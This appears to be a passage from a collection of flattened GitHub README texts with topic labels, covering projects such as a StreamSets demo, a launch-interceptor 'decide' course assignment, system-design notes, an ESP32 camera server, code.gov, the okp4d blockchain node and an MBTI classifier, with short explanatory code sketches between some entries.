com mapr demos predictive maintenance raw master sample dataset mqtt json gz unzip mqtt json gz docker cp mqtt json sdc tmp mqtt json open streamsets at http localhost 18630 and login with admin admin download and import the following pipeline into streamsets if you don t know how to import a pipeline refer to streamsets docs wget https raw githubusercontent com mapr demos predictive maintenance master streamsets mqtt 20file 20tail json you will see a warning about a missing library in the parse mqtt json stage click that stage and follow the instructions to install the jython library img src https github com mapr demos predictive maintenance blob master images streamsets warning png width 50 align center finally run the streamsets pipeline img src https github com mapr demos predictive maintenance blob master images grafana streamset animation gif width 90 align center hopefully by setting up this pipeline and exploring streamsets you ll get the gist of what dataflow management tools can do
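The LSTM notebooks above all reduce "predict the next value" to the same supervised-learning shape: slide a fixed-size window over the time series and pair each window with the value that immediately follows it. A minimal, framework-free sketch of that preprocessing step (the function name `make_windows` is ours, not from the notebooks):

```python
def make_windows(series, window_size):
    """Turn a 1-D sequence into (input_window, next_value) training pairs,
    the supervised format an LSTM next-value predictor is trained on."""
    pairs = []
    for i in range(len(series) - window_size):
        x = series[i:i + window_size]   # model input: the last `window_size` values
        y = series[i + window_size]     # target: the value that follows the window
        pairs.append((x, y))
    return pairs

# Example: a toy "sensor reading" sequence
data = [10, 11, 13, 12, 15, 16]
for x, y in make_windows(data, window_size=3):
    print(x, "->", y)
```

In the actual notebooks these pairs would then be reshaped into the 3-D `(samples, timesteps, features)` tensor that Keras LSTM layers expect.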
server
decide
condition checking function for interceptor launch program this project consists of an implementation of a function decide which is part of a hypothetical anti ballistic missile system the function analyses radar tracking information consisting of a collection of planar point coordinates and returns a boolean signal which determines whether an interceptor should be launched based on this information the project is a part of the course software engineering and cloud computing https kth instructure com courses 9098 the assignment is based upon the material in the article an experimental evaluation of the assumption of independence in multiversion programming j c knight and n g leveson ieee transactions on software engineering 12 1 96 109 january 1986 inputs and outputs of decide inputs the decide function has the following inputs points a matrix containing the coordinates of data points xi yi on the format x1 y1 x2 y2 parameters a struct containing parameters for the launch interceptor conditions lics lcm logical connector matrix with elements 0 notused 1 or 2 and puv preliminary unlocking vector outputs the decide function has the following outputs launch final launch no launch decision encoded as yes or no standard output cmv conditions met vector pum preliminary unlocking matrix fuv final unlocking vector description of the decide function the decide function computes whether 15 different launch interceptor conditions lics are fulfilled each of the lic functions has as inputs the x coordinates x and the y coordinates y of the points in points as well as some of the parameters in parameters the results are stored in the 15 dimensional conditions met vector cmv such that cmv i 1 if lic i is met and cmv i 0 if not the logical connector matrix lcm size 15 x 15 has as entries 0 1 and 2 to be interpreted as 0 notused 1 or 2 and this matrix represents connections between the different lics using lcm the results of the lics in cmv are combined to form the preliminary 
unlocking matrix pum size 15 x 15 this proceeds as follows if lcm i j 0 notused then pum i j 1 true if lcm i j 1 or then pum i j 1 true if cmv i 1 or cmv j 1 and pum i j 0 otherwise if lcm i j 2 and then pum i j 1 true if cmv i 1 and cmv j 1 and pum i j 0 otherwise the input preliminary unlocking vector puv length 15 has elements puv i 1 if lic i should be considered as a factor in signaling interceptor launch and puv i 0 if it should not the final unlocking vector fuv length 15 is constructed according to fuv i 1 if puv i 0 i e if lic i should not be considered fuv i 1 if puv i 1 and all elements of row i in pum are 1 true fuv i 0 otherwise finally the decision launch is set to yes if all entries of fuv are true 1 and to no otherwise how to use it the main program main m defines example inputs to the decide function invokes the function and prints the outputs of which the first one is the decision launch yes or launch no the meanings of the parameters as well as the general evaluation criteria for the lics are described in the comments of each function lic1 m lic15 m which are located in the folder conditions the program main m can be run as it is to illustrate the functioning of the decide function the user can then try to modify the parameters in parameters the entries of the logical connector matrix lcm where each entry should be an integer according to 0 notused 1 or and 2 and the preliminary unlocking vector puv where each entry is 0 or 1 corresponding to false or true as well as the data point matrix points x1 y1 x2 y2 testing the project includes a script test m that automates testing of the project functions by running the script test m each of the functions lic1 lic15 in the folder conditions is automatically tested with two test cases one input that should yield 1 true and one input that should yield 0 false the decide function is also tested with an input that should yield yes the same input as in the default example in main m the results of these tests
are automatically printed the tests are defined and described in the class testingclass m which is located in the folder tests
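The PUM/FUV construction described above is mechanical but easy to get subtly wrong, so here is a compact sketch of it (pure Python with 0-based indexing and NOTUSED=0, OR=1, AND=2 as in the text; the actual project is written in MATLAB):

```python
NOTUSED, OR, AND = 0, 1, 2

def build_pum(cmv, lcm):
    """Combine the conditions-met vector cmv with the logical connector matrix lcm."""
    n = len(cmv)
    pum = [[True] * n for _ in range(n)]   # NOTUSED entries stay True
    for i in range(n):
        for j in range(n):
            if lcm[i][j] == OR:
                pum[i][j] = bool(cmv[i] or cmv[j])
            elif lcm[i][j] == AND:
                pum[i][j] = bool(cmv[i] and cmv[j])
    return pum

def build_fuv(pum, puv):
    """fuv[i] is True when lic i is ignored (puv[i] == 0) or its whole pum row holds."""
    return [not puv[i] or all(pum[i]) for i in range(len(puv))]

def decide(cmv, lcm, puv):
    fuv = build_fuv(build_pum(cmv, lcm), puv)
    return "yes" if all(fuv) else "no"

# Tiny 2-condition example: both lics met, combined with AND, both considered.
print(decide([1, 1], [[AND, AND], [AND, AND]], [1, 1]))  # -> yes
```

Note how a lic excluded via puv cannot block a launch even if its pum row contains a False entry, exactly as the fuv rules above require.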
cloud
SystemDesign
h1 basics h1 ol li network ol li a href basics network protocol readme md network protocols a li li a href basics http requests readme md http requests a ol li get li li post li li put li ol li li a href basics polling sse and web sockets readme md polling polling a li li a href basics polling sse and web sockets readme md server sent events sse server sent events a li li a href basics polling sse and web sockets readme md websockets websockets a li ol li li database ol li a href basics relational vs nonrelational readme md relational vs non relational database a li li a href basics horizontal and vertical scaling readme md horizontal vs vertical scaling a ul li a href basics horizontal and vertical scaling project project a li ul li li a href basics acid theorem readme md acid and base theorems a li li a href basics cap theorem readme md cap theorem a li li database management systems ul li ca systems ul li a href basics databases rdbms readme md rdbms mysql ca system a li li a href basics databases memcached readme md memcached ca system a li ul li li ap system ul li a href basics databases cassandra readme md cassandra ap system a li li a href basics databases redis readme md redis ap system a li ul li li cp system ul li a href basics databases mongodb readme md mongodb cp system a li ul li ul li li a href basics data partitioning methods readme md data partitioning methods a ul li a href basics data partitioning methods readme md horizontal partitioning sharding horizontal partitioning sharding a li li a href basics data partitioning methods readme md vertical partitioning vertical partitioning a li ul li li a href basics data partitioning criteria readme md data partitioning criteria a ul li a href basics data partitioning criteria readme md range range a li li a href basics data partitioning criteria readme md list list a li li a href basics data partitioning criteria readme md hash hash a li li a href basics data partitioning criteria readme md round robin 
round robin a li li a href basics data partitioning criteria readme md name node name node a li ul li li a href basics denormalization vs normalization readme md data normalization and de normalization a li ol li li components ol li a href basics message queues readme md message queues a li li a href basics cache readme md cache a ol li a href basics cache readme md client side caching reverse proxy or cdn a li li a href basics cache readme md client side caching forward proxy a li ol li li a href basics load balancing readme md load balancing a li li a href basics dns readme md dns server a li ol li li other concepts ol li a href basics other concepts quorum readme md quorum sloppy quorum and hinted handoff a li li a href basics other concepts gossip protocol readme md gossip protocol a li li a href https www youtube com watch v zarkonvygr8 ab channel gauravsen consistent hashing a li li a href basics other concepts stateless web tier readme md stateless web tier a li ol li li other softwares ol li a href basics other softwares docker readme md docker a li li a href basics other softwares zookeeper readme md zookeeper a li li a href basics other softwares apache solr readme md solr a li li a href basics other softwares elasticsearch readme md elasticsearch a li li a href basics other softwares puppet readme md puppet a li li a href basics other softwares grpc readme md grpc a li ol li li designing data intensive applications notes ol li a href basics ddia chapter 1 readme md reliable scalable and maintainable applications a li li a href basics ddia chapter 2 readme md data models and query languages a li li a href basics ddia strike storage and retrieval strike a li li a href basics ddia strike encoding and evolution strike a li li a href basics ddia strike replication strike a li li a href basics ddia strike partitioning strike a li li a href basics ddia strike transactions strike a li li a href basics ddia strike the trouble with distributed systems strike a li 
li a href basics ddia strike consistency and consensus strike a li li a href basics ddia strike batch processing strike a li li a href basics ddia strike stream processing strike a li li a href basics ddia strike the future of data systems strike a li ol li ol h1 system design h1 p basics p ul li a href sysdesigns systemdesignsteps readme md basic system design steps a li ul p my designs p ul li a href sysdesigns newsfeed readme md news feed a ul li a href sysdesigns newsfeed project readme md project a li ul li li a href sysdesigns tiny url readme md tiny url a ul li a href sysdesigns tiny url project readme md project a li ul li li booking system li ul li a href sysdesigns booking system hotel reservation system readme md hotel reservation system a li li a href sysdesigns booking system avoiding double booking readme md avoiding double booking a li ul ul p notes on existing architectures p ul li a href sysdesigns pinterest readme md pinterest architecture 2012 a li li a href sysdesigns dynamo readme md dynamo distributed key value store a li li instagram ul li a href sysdesigns instagram 2011 architecture overview readme md architecture 2011 a li li a href sysdesigns instagram 2012 sharding readme md sharding 2012 a li ul li li a href sysdesigns centralized logging system readme md centralized logging system a ul li types of logging approaches ol li a href sysdesigns centralized 20logging 20system replication 20approch approch png logs are copied from the db a li li a href sysdesigns centralized 20logging 20system transport 20approch approch png logs are copied from the server a li ol li li a href sysdesigns centralized 20logging 20system netflix s 20logging 20system readme md netflix s logging system a li ul li ul h1 good reads h1 ul li a href https github com donnemartin system design primer system design primer by donne martin a li li a href https github com checkcheckzz system design interview system design interview resources by checkcheckzach a li li a href 
https gist github com vasanthk 485d1c25737e8e72759f system design cheat sheet by vasanth k a li li a href https www ibm com cloud learn ibm cloud learn a li li a href https igotanoffer com blogs tech network protocols proxies system design interview system design interview concepts on igotanoffer a li li a href http highscalability com high scalability a li li a href http patrickhalina com posts ml systems design interview guide ml systems design interview guide by patrik halina a li li a href https github com alex what happens when what happens when you type something in address bar a li li a href https www youtube com watch v w9f d3oy4 ab channel jorgescott cs75 summer 2012 lecture 9 scalability harvard web development david malan a ul li a href http ninefu github io blog harvard cs75 notes notes for harvard cs75 web development lecture 9 scalability by david malan a li ul li li a href http ninefu github io blog system design reading list system design reading list by nine notes a li li a href https www teamblind com post willing to help for system design xqq5u63y system design steps from blind article by gf from flipkart a li ul
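One of the concepts linked above, consistent hashing, is compact enough to sketch directly: both keys and nodes are hashed onto the same ring, and a key belongs to the first node clockwise from its position, so adding or removing a node only remaps the keys in one arc. A minimal sketch without virtual nodes (node names are made-up examples):

```python
import hashlib
from bisect import bisect

def ring_hash(s):
    """Map a string to a position on a 32-bit hash ring."""
    return int(hashlib.md5(s.encode()).hexdigest(), 16) % (2 ** 32)

class HashRing:
    def __init__(self, nodes):
        # Sorted (position, node) pairs form the ring.
        self.ring = sorted((ring_hash(n), n) for n in nodes)

    def node_for(self, key):
        """First node clockwise from the key's position (wrapping around)."""
        points = [p for p, _ in self.ring]
        i = bisect(points, ring_hash(key)) % len(self.ring)
        return self.ring[i][1]

ring = HashRing(["cache-a", "cache-b", "cache-c"])
print(ring.node_for("user:42"))  # the same key always maps to the same node
```

Production systems typically add many virtual nodes per physical node to even out the arc sizes; the lookup logic stays the same.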
system-design
os
esp32-cam-mjpeg-multiclient
esp32 mjpeg multiclient streaming server this is a simple mjpeg streaming webserver implemented for ai thinker esp32 cam or esp eye modules this is tested to work with vlc and blynk video widget this version uses freertos tasks to enable streaming to up to 10 connected clients inspired by and based on this instructable 9 rtsp video streamer using the esp32 cam board https www instructables com id 9 rtsp video streamer using the esp32 cam board full story https www hackster io anatoli arkhipenko multi client mjpeg streaming from esp32 47768f other repositories that may be of interest esp32 mjpeg streaming server servicing a single client https github com arkhipenko esp32 cam mjpeg esp32 mjpeg streaming server servicing multiple clients freertos based https github com arkhipenko esp32 cam mjpeg multiclient esp32 mjpeg streaming server servicing multiple clients freertos based with the latest camera drivers from espressif https github com arkhipenko esp32 mjpeg multiclient espcam drivers cooperative multitasking library https github com arkhipenko taskscheduler
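An MJPEG stream is simply an HTTP response of type `multipart/x-mixed-replace` in which each part is one JPEG frame; the per-client FreeRTOS task in this server repeatedly writes a part header followed by the frame bytes. A language-agnostic sketch of that framing (the firmware itself is Arduino C++; the boundary string here is an arbitrary example, not the one the server uses):

```python
BOUNDARY = "frameboundary"  # arbitrary; must match the Content-Type header

def stream_headers():
    """Response headers sent once, when a client connects."""
    return ("HTTP/1.1 200 OK\r\n"
            f"Content-Type: multipart/x-mixed-replace; boundary={BOUNDARY}\r\n\r\n")

def frame_part(jpeg_bytes):
    """One multipart chunk: sent once per captured JPEG frame, forever."""
    head = (f"--{BOUNDARY}\r\n"
            "Content-Type: image/jpeg\r\n"
            f"Content-Length: {len(jpeg_bytes)}\r\n\r\n").encode()
    return head + jpeg_bytes + b"\r\n"
```

Because each part replaces the previous one in the viewer, clients like VLC render the sequence as live video with no player-side buffering logic.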
video streaming esp32 esp32-cam esp-eye freertos rtos multiclient webserver gstreamer vlc
os
code-gov-front-end
code gov unlocking the potential of the federal government s software build status https circleci com gh gsa code gov front end svg style svg https circleci com gh gsa code gov front end code climate https api codeclimate com v1 badges 4675ef3ed03728b81e66 maintainability https codeclimate com github gsa code gov front end maintainability tested with jest https img shields io badge tested with jest 99424f svg https github com facebook jest introduction code gov https code gov is a website promoting good practices in code development collaboration and reuse across the u s government code gov provides tools and guidance to help agencies implement the federal source code policy https sourcecode cio gov it also includes an inventory of government custom code to promote reuse between agencies and provides tools to help government and the public collaborate on open source projects to learn more about the project check out this blog post https www whitehouse gov blog 2016 08 08 peoples code code gov is an open source project so we invite your contributions be it in the form of code design or ideas contributing here s how you can help contribute to code gov source code policy to provide feedback on the federal source code policy https sourcecode cio gov follow this issue tracker https github com whitehouse source code policy issues code gov to provide feedback on code gov front end please check out our contributing guidelines contributing md to contribute to the code gov data go to the code gov data repo at https github com gsa code gov data check out code gov https github com gsa code gov for a list of additional project repositories if you aren t sure where your question or idea fits this is a good place to share it getting started you will need node to run this website it s built against v10 19 0 the best way to get node is to install it via nvm see the nvm installation instructions https github com nvm sh nvm blob master readme md installation and update to set it up on
your system after you have cloned this repo you can use npm install to install all of the project s dependencies you can then run the server using npm run start by default the development server will listen on http localhost 8080 you can change the default port by setting the port environment variable before starting the server for example port 3000 npm start specifying an api key the app uses the api key provided in the site json by default if you want to override that specify a code gov api key environment variable here s an example code gov api key l87sfdi7ybc2bic7bai8cb2i176c3b872tb3 npm run start an alternate approach to using your api key every time you use npm run start is to create a env local file and store your api key remember to use code gov api key in accordance with dotenv flow https www npmjs com package dotenv flow your personal key will be ignored when committing updates to gh you can sign up for an api key https open gsa gov api codedotgov file structure the directories in src are organized around the pillars of react along with several additional custom file types when creating new files be sure to add your file and any necessary templates styles and tests to a directory dedicated to your new file in the appropriate place testing unit testing is done using the jest https github com facebook jest framework with enzyme https github com airbnb enzyme use npm run test to run unit tests a single time this will generate a code coverage report use npm run test watch to run unit tests continuously re running each time a file is saved by default only files changed since the last commit will be run follow the command line prompt for customizing how tests are run snapshot tests can be updated while running this command by pressing u to update them note console log warn error are mocked in unit tests and will not print anything to avoid cluttering the command line use a different logging such as console info for debugging while running tests note site
should be running locally before executing npm run test or you might get false errors due to the component plugins being used to run web accessibility testing do the following a make sure ruby https www ruby lang org en documentation installation and the bundler gem https bundler io are installed on your computer b start a server by running npm run start c use the npm run test pa11y command to run the accessibility tests pa11y ci uses urls in the sitemap file to run tests against it currently excludes anything in projects since this is over 6000 items it would take a long time to finish and just report the same issues over and over additional accessibility testing configuration is located in the pa11yci file a select few projects are listed here as urls to test these are tested in addition to the sitemap xml the sitemap find and sitemap replace commands allow us to scan the named pages in the sitemap but test them locally against the server you are running on your machine we follow the wcag2aa standard for more info on the rules being tested check out the pa11y wiki https github com pa11y pa11y wiki html codesniffer rules end to end tests we use cypress to run end to end tests to run cypress testing do the following a make sure you run npm install to install all of the project s dependencies b start a server by running npm run start c use the npm run test cypress command to run the cypress tests once these steps are completed you should see the list of spec files cypress startup assets img cypress running png click the run all specs button in the upper right to run the tests cypress tests assets img cypress tests png deployment read about how to publish to github pages federalist and elsewhere here deployment md bundle analysis https federalist proxy app cloud gov preview gsa code gov front end federalist bundle analysis report html deploying arbitrary branch coming soon generating license data to update the dependency licenses json file run npm run licenses
configuration for documentation on how to configure code gov front end read here configuration md questions if you have questions please feel free to contact us open an issue https github com gsa code gov front end issues linkedin https www linkedin com company code gov twitter https twitter com codedotgov email mailto code gsa gov or join our opensource public channel on slack https chat 18f gov license as stated in contributing contributing md this project is in the worldwide public domain in the public domain within the united states and copyright and related rights in the work worldwide are waived through the cc0 1 0 universal public domain dedication https creativecommons org publicdomain zero 1 0 all contributions to this project will be released under the cc0 dedication by submitting a pull request you are agreeing to comply with this waiver of copyright interest
civic-tech federal-government federal helpwanted open-source code-gov code-gov-front-end
front_end
mml-book.github.io
mml book github io companion webpage to the book mathematics for machine learning https mml book com https mml book com copyright 2020 by marc peter deisenroth a aldo faisal and cheng soon ong to be published by cambridge university press we are in the process of writing a book on mathematics for machine learning that motivates people to learn mathematical concepts the book is not intended to cover advanced machine learning techniques because there are already plenty of books doing this instead we aim to provide the necessary mathematical skills to read those other books we split the book into two parts mathematical foundations example machine learning algorithms that use the mathematical foundations we aim to keep this book reasonably short so we cannot cover everything we will also provide exercises for part 1 and jupyter notebooks for part 2 of the book the notebooks can be run live on binder https mybinder org badge logo svg https mybinder org v2 gh mml book mml book github io master filepath tutorials alternatively try them directly on google colab title tutorial notebook solution linear regression open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial linear regression ipynb open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial linear regression solution ipynb principal component analysis pca open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial pca ipynb open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial pca solution ipynb gaussian mixture model gmm open in colab https colab research google com assets colab badge 
svg https colab research google com github mml book mml book github io blob master tutorials tutorial gmm ipynb open in colab https colab research google com assets colab badge svg https colab research google com github mml book mml book github io blob master tutorials tutorial gmm solution ipynb
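The first tutorial, linear regression, rests on a small slice of the book's linear algebra: for a single input variable the least-squares solution has a closed form, slope = cov(x, y) / var(x). A dependency-free sketch of that closed form (the tutorials themselves use richer, matrix-based formulations):

```python
def fit_line(xs, ys):
    """Least-squares fit of y = a*x + b for 1-D data, via the closed form."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n          # sample means
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    var = sum((x - mx) ** 2 for x in xs)
    a = cov / var                               # slope = cov(x, y) / var(x)
    b = my - a * mx                             # intercept from the means
    return a, b

print(fit_line([0, 1, 2, 3], [1, 3, 5, 7]))  # exact line y = 2x + 1 -> (2.0, 1.0)
```

The multivariate generalization replaces this ratio with the normal equations, which is where the book's chapters on vector calculus and matrix decompositions come in.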
ai
okp4d
okp4 github banner https raw githubusercontent com okp4 github main profile static okp4 banner v2 webp https okp4 network p align center a href https discord gg okp4 img src https img shields io badge discord 7289da style for the badge logo discord logocolor white a nbsp a href https www linkedin com company okp4 open knowledge protocol for img src https img shields io badge linkedin 0077b5 style for the badge logo linkedin logocolor white a nbsp a href https twitter com okp4 protocol img src https img shields io badge twitter 1da1f2 style for the badge logo twitter logocolor white a nbsp a href https medium com okp4 img src https img shields io badge medium 12100e style for the badge logo medium logocolor white a nbsp a href https www youtube com channel uciofctauyv2szv4oqiepivg img src https img shields io badge youtube ff0000 style for the badge logo youtube logocolor white a p 4 lint https img shields io github actions workflow status okp4 okp4d lint yml label lint style for the badge logo github https github com okp4 okp4d actions workflows lint yml build https img shields io github actions workflow status okp4 okp4d build yml label build style for the badge logo github https github com okp4 okp4d actions workflows build yml test https img shields io github actions workflow status okp4 okp4d test yml label test style for the badge logo github https github com okp4 okp4d actions workflows test yml codecov https img shields io codecov c github okp4 okp4d style for the badge token o3fjo5qdca logo codecov https codecov io gh okp4 okp4d docker pull https img shields io docker pulls okp4 okp4d label downloads style for the badge logo docker https hub docker com r okp4 okp4d discord https img shields io discord 946759919678406696 svg label discord logo discord logocolor white style for the badge https discord gg okp4 conventional commits https img shields io badge conventional 20commits 1 0 0 yellow svg style for the badge logo conventionalcommits https 
conventionalcommits org semantic release https img shields io badge 20 20 f0 9f 93 a6 f0 9f 9a 80 semantic release e10079 svg style for the badge https github com semantic release semantic release contributor covenant https img shields io badge contributor 20covenant 2 1 4baaaa svg style for the badge https github com okp4 github blob main code of conduct md license https img shields io github license okp4 okp4d svg label license style for the badge https opensource org licenses apache 2 0 okp4 is a public dpos https en bitcoinwiki org wiki dpos layer 1 specifically designed to enable communities to trustlessly share data algorithms and resources to build the dataverse an open world where everybody can create or participate in custom ecosystems with common governance mechanisms sharing rules business models to build a new generation of dapps way beyond decentralized finance the protocol okp4d is the node of the okp4 https okp4 network network built on the cosmos sdk tendermint consensus and designed to become a hub of incentivized data providers developers data scientists users collaborating to generate value from data and algorithms read more in the introduction blog post https blog okp4 network what is okp4 b6bb058ae221 for a high level overview of the okp4 protocol and network economics check out the white paper https docs okp4 network docs whitepaper abstract want to become a validator validators are responsible for securing the okp4 network validator responsibilities include maintaining a functional node https docs okp4 network docs nodes run node with constant uptime and providing a sufficient amount of know as stake in exchange for this service validators receive block rewards and transaction fees want to become a validator checkout the documentation https docs okp4 network docs nodes introduction looking for a network to join checkout the networks https github com okp4 networks supported platforms the okp4d blockchain currently supports the following builds 
platform arch status darwin amd64 darwin arm64 linux amd64 linux arm64 windows amd64 br not supported note as the blockchain depends on cosmwasm wasmvm https github com cosmwasm wasmvm we only support the targets supported by this project releases all releases can be found here https github com okp4 okp4d releases okp4d follows the semantic versioning 2 0 0 https semver org to determine when and how the version changes and we also apply the philosophical principles of release early release often https en wikipedia org wiki release early release often docker image for a quick start a docker image is officially available on docker hub https hub docker com r okp4 okp4d bash docker pull okp4 okp4d latest get the documentation bash docker run okp4 okp4d latest help query a running network example bash api url https api devnet okp4 network 443 rpc wallet okp41pmkq300lrngpkeprygfrtag0xpgp9z92c7eskm docker run okp4 okp4d latest query bank balances wallet chain id okp4 devnet 1 node api url create a wallet bash docker run v pwd home home okp4 okp4d latest keys add my wallet keyring backend test home home start a node everything you need to start a node and more is explained here https docs okp4 network docs nodes run node bash moniker node in my name chain id localnet okp4 1 docker run v pwd home home okp4 okp4d latest init moniker chain id chain id home home this will create a home folder you can then update the config genesis json with one of this ones https github com okp4 okp4d tree main chains join a running network set persistent peers in config config toml file then start the node bash docker run v pwd home home okp4 okp4d latest start home home developing contributing okp4d is written in go and built using cosmos sdk a number of smart contracts are also deployed on the okp4 blockchain and hosted in the okp4 contracts https github com okp4 contracts project prerequisites install go 1 21 following instructions from the official go documentation https golang org doc 
install use gofumpt https github com mvdan gofumpt as formatter you can integrate it in your favorite ide following these instructions https github com mvdan gofumpt installation or invoke the makefile make format go verify that docker is properly installed and if not follow the instructions https docs docker com for your environment verify that make https fr wikipedia org wiki make is properly installed if you intend to use the provided makefile makefile the project comes with a convenient makefile that helps you to build install lint and test the project text make target targets lint lint lint all available linters lint go lint go source code lint proto lint proto files format format run all available formatters format go format go files format proto format proto files build build build all available artefacts executable docker image etc build go build node executable for the current environment default build build go all build node executables for all available environments install install install node executable test test pass all the tests test go pass the test for the go source code chain chain init initialize the blockchain with default settings chain start start the blockchain with existing configuration see chain init chain stop stop the blockchain chain upgrade test the chain upgrade from the given from version to the given to version clean clean remove all the files from the target folder proto proto generate all resources for proto files go doc etc proto format format protobuf files proto build build all protobuf files proto gen generate all the code from the protobuf files documentation doc generate all the documentation doc proto generate the documentation from the protobuf files doc command generate markdown documentation for the command mock mock generate all the mocks for tests release release assets generate release assets help help show this help this makefile depends on docker to install it please follow the instructions for macos https docs 
docker com docker for mac install for windows https docs docker com docker for windows install for linux https docs docker com engine install build to build the okp4d node invoke the goal build of the makefile sh make build the binary will be generated under the folder target dist bug reports feature requests if you notice anything not behaving how you expected if you would like to make a suggestion or would like to request a new feature please open a new issue https github com okp4 okp4d issues new choose we appreciate any help you re willing to give don t hesitate to ask if you are having trouble setting up your project repository creating your first branch or configuring your development environment mentors and maintainers are here to help community the okp4 discord server https discord gg okp4 is our primary chat channel for the open source community software developers and node operators please reach out to us and say hi we re happy to help there cosmos sdk https v1 cosmos network sdk docker https www docker com go https go dev tendermint https tendermint com
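The init/start docker commands walked through above can be scripted; here is a minimal Python sketch that just reassembles those command lines (image tag and flag names mirror the README commands; this is an illustration, not official okp4 tooling):

```python
# Sketch: reconstruct the `docker run` invocations described above for
# initializing and starting an okp4d node. Image tag and flag names
# mirror the README; treat this as illustrative only.
import os

IMAGE = "okp4/okp4d:latest"

def init_cmd(moniker, chain_id, home_dir="/home"):
    """`okp4d init` inside docker, mounting the current dir as home."""
    return ["docker", "run", "-v", f"{os.getcwd()}:{home_dir}", IMAGE,
            "init", moniker, "--chain-id", chain_id, "--home", home_dir]

def start_cmd(home_dir="/home"):
    """Start the node once genesis.json and persistent_peers are set."""
    return ["docker", "run", "-v", f"{os.getcwd()}:{home_dir}", IMAGE,
            "start", "--home", home_dir]

print(" ".join(init_cmd("node-in-my-name", "localnet-okp4-1")))
```

The commands are returned as argv lists so they can be handed to `subprocess.run` once the genesis file and peers are configured.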
blockchain cosmos-sdk golang
blockchain
assignment-
assignment week one assignment done by zarr patel for the given criteria analyze an array of unsigned char data items and report analytics on the maximum minimum mean and median of the data set this assignment is for embedded system design on coursera
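The analysis the assignment describes can be prototyped quickly outside the embedded target; a minimal Python sketch (the course assignment itself is written in C, and typically truncates the mean and median to integers, which is not done here):

```python
# Sketch of the week-one analysis: maximum, minimum, mean, and median
# of an array of unsigned-char (0-255) data items. Illustrative only;
# the actual assignment implements this in C.
from statistics import mean, median

def analyze(data):
    """Return (maximum, minimum, mean, median) of a list of 0-255 values."""
    if not data:
        raise ValueError("empty data set")
    return max(data), min(data), mean(data), median(data)

sample = [34, 201, 190, 154, 8, 194, 2, 6, 114, 88]
print(analyze(sample))  # (201, 2, 99.1, 101)
```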
os
NLP-Specialization
nlp specialization nlp specialization made by deeplearning ai natural language processing specialization this 4 course specialization is launched on june 17 right now the repository contains files for course 1 2 and 3 the assignment files are already completed further files of course 4 will be uploaded when the courses go live edits update 1 course 3 materials added on 07 31 2020 more week materials will be added by aug 2 update 2 course 3 final materials added on 08 02 2020 high size files can be downloaded by coursera update 3 c3 wx assignment original ipynb files with no prefilled code are added in course 3 by demand from sun trancks update 4 for the launch of course 4 i have decided only to upload the assignment ipynb and the prefilled version of it the additional resources data model utils py can be acquired from coursera update 5 course 4 content added on 09 23 2020 with only the assignment ipynb and prefilled ipynb usage use the assignment files with prefilled code for reference only disclaimer the files uploaded were used during the alpha testing of the course chances are there might be changes in the new files if there is any major change you d like to address you can mail me on gmail mailto sachin27071998 gmail com or send a message on my linkedin profile https www linkedin com in sachinwani27 contributing pull requests are welcome for major changes please open an issue first to discuss what you would like to change
nlp-specialization deeplearning-ai solutions solution github machine-learning coursera nlp natural-language-processing specialization course assignments assignment assignment-solutions coursera-assignment
ai
houston
eduzz houston publish https github com eduzz houston actions workflows master yml badge svg branch master https github com eduzz houston actions workflows master yml version https img shields io npm v eduzz houston ui https www npmjs com package eduzz houston ui img src src public img welcome png width 100 full installation bash all packages for everyday use yarn add eduzz houston projects package description link version eduzz houston ui ui components for the web view pages ui components version https img shields io npm v eduzz houston ui https www npmjs com package eduzz houston ui eduzz houston styles style builder with support for the design tokens view pages styles version https img shields io npm v eduzz houston ui https www npmjs com package eduzz houston ui eduzz houston tokens global design system variables view pages tokens version https img shields io npm v eduzz houston ui https www npmjs com package eduzz houston ui eduzz houston mobile ui components for mobile view https github com eduzz houston mobile version https img shields io npm v eduzz houston mobile https www npmjs com package eduzz houston mobile eduzz eslint config houston default configuration for eslint view pages eslint config version https img shields io npm v eduzz eslint config houston https www npmjs com package eduzz eslint config houston eduzz houston forms hooks for form validation view pages forms version https img shields io npm v eduzz houston forms https www npmjs com package eduzz houston forms eduzz houston hooks assorted hooks view pages forms version https img shields io npm v eduzz houston hooks https www npmjs com package eduzz houston hooks want to contribute see the details here contributing md
ui-components design-system react eduzz javascript typescript hacktoberfest antd
os
Predicting_Personality_Type
predicting myers briggs personality types from social media posts capstone project i completed as a student in the data science immersive program at general assembly this project uses natural language processing techniques to analyze text postings on a social forum and predict the writers myers briggs personality type using a classification model it also compares personality types based on other factors such as the length polarity and subjectivity of these posts techniques models used natural language processing nlp stopwords porterstemmer textblob countvectorizer randomforestclassifier kneighborsclassifier onevsrestclassifier gridsearchcv tukey range test t test numpy pandas matplotlib seaborn background personality refers to individual differences in characteristic patterns of thinking feeling and behaving personality typologies classify different types of individuals to reveal and enhance the understanding of their behaviors the myers briggs type indicator mbti is a psychological assessment tool to classify people into one of 16 different personality types the classification system consists of a four letter code based on four axes where each letter in the code refers to the predominant trait in each axis the four axes are introversion i extroversion e describes the different attitudes people use to direct their energy i e the inner world vs one s outer world intuition n sensing s describes people s method of processing informaton i e paying more attention to the patterns and possibilities seen in the information received vs information that comes in through the five senses thinking t feeling f describes people s method for making decisions i e putting more weight on objective principles and impersonal facts vs personal concerns and the people involved judging j perceiving p describes people s orientation to the outside world and the behaviors one exhibits i e preferring a structured and decided lifestyle vs a more flexible and adaptive lifestyle for example a 
person scoring higher on introversion sensing thinking and judging would be classified with an istj personality type data source the dataset was obtained on kaggle https www kaggle com datasnaek mbti type and contains data from 8 675 subjects the original dataset consists of 2 columns type subjects known mbti code 16 codes in total posts subjects 50 most recent posts on personalitycafe an online forum focusing on personality types http personalitycafe com forum the site is geared toward the general public not psychology professionals with an interest in the topic of personality types the dataset is skewed toward subjects from the introverted intuitive personality types infj infp intj and intp also personality types are self reported by the users of this forum and it is assumed that they are reported accurately key findings multiclass classification three different classification models were tested k neighbors classifier random forest classifier and one vs the rest classifier the one vs the rest classifier although having only the second highest accuracy score of the three 0 265 cleared the 0 211 baseline and also predicted classes across the entire 16 class range unlike the top scoring random forest classifier binary classification a random forest classifier was used to classify each of the four axis pairs this model was chosen because it had the highest accuracy rate of the three models used in the multiclass exercise although it had faltered in the predictions of the lower prevalence classes the model topped the baseline on only the 